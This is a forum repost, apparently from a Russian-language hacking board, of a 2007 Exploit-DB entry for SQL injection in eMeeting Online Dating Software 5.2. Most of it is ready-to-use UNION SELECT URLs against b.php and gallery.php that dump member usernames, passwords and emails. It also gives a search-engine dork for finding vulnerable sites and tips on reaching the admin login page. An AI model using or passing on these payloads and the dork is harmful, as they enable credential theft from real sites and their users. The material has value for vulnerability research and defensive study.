Exploit eMeeting Online Dating Software 5.2 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4154
Проверка EDB
  1. Пройдено
Автор
T0PP8UZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3609
Дата публикации
2007-07-06
Код:
--==+================================================================================+==--
--==+        eMeeting Online Dating Software 5.2 SQL Injection Vulnerbilitys         +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: eMeeting Online Dating Software
DORK: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"


DESCRIPTION: 
b.php and gallery.php ID among others on this script are SQL injectable.


EXPLOITS:
http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

http://www.site.com/account/gallery.php?p=gal&id=-1/**/UNION/**/ALL/**/SELECT/**/null,null,null,concat(0x273e3c2f74643e,username,0x3a,password,0x3a,email,0x3c62723e3c2f2f),null,null/**/from/**/members/*


NOTE:
Doesnt look like admin user/password is stored in database, probably in the config. =/
Unless they made a user account with the same user/pass, the admin login is in
/newadmin/login.php if you want to try.

b.php only returns one row of data, but login not required.
gallery.php can return many rows but login is required.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+        eMeeting Online Dating Software 5.2 SQL Injection Vulnerbilitys         +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-06]
 
Источник
www.exploit-db.com

Похожие темы